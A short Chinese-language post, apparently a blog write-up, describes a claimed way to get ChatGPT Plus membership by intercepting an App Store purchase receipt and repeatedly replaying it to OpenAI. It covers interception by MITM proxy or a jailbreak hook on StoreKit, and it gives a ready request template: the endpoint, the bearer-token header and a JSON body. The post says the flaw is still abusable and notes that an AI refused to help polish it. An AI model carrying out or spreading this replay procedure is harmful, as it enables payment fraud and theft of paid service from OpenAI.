本文的漏洞在 2026年04月17日 仍可以复现且被滥用。本文涉及可复现的验证的安全漏洞，阅读者应在遵守相关法律法规的前提下开展研究。

本文由于Claude Opus 4.7拒绝润色，完全由人工完成

总体逻辑说明 #

使用Apple AppStore订阅ChatGPT会员，其付款请求均由Apple负责，其会向OpenAI后端上传相关支付凭证，用于证明该用户已经付款，我们可以通过拦截上传支付凭证这一步，将支付凭证反复向OpenAI发送直接获得会员权限。

具体实现 #

准备AppStore支付余额 #

土耳其区ChatGPT Plus标价 499 里拉一个月，向账户内充值余额。

拦截收据凭证 #

Apple 通常将收据存储到本地沙盒目录里。可以使用拦截手段使得凭证不发送到 OpenAI 后端API。

凭证为Base64编码形式，注意排查。

方法A：通过Loon/Surge/MITMProxy/Charles Proxy等网络软件实现DNS重定向至自建签发证书的网站或者中间人攻击直接拦截凭证信息。

方法B：通过越狱（Frida 或者 Flex）向StoreKit添加Hook，拦截SKPaymentTransaction的transactionReceipt，也可以直接读取appStoreReceiptURL。

凭据配合账号凭证获得会员 #

请求端点：https://chat.openai.com/backend-api/subscription/upgrade

请求方法：POST

请求头：

Content-Type: application/json
Authorization: Bearer <目标账号的 Auth Token>

请求内容：

{
    "receipt": "<Base64 编码的 iOS 收据>",
    "platform": "ios",
    "product_id": "http://com.openai.chatgpt.plus",
    "device_info": {
        "model": "iPhone14,2",
        "os_version": "17.0",
        "timezone": "Asia/Shanghai",
        ...
    }
}

总结 #

该漏洞即为简单，但仍长期未修复。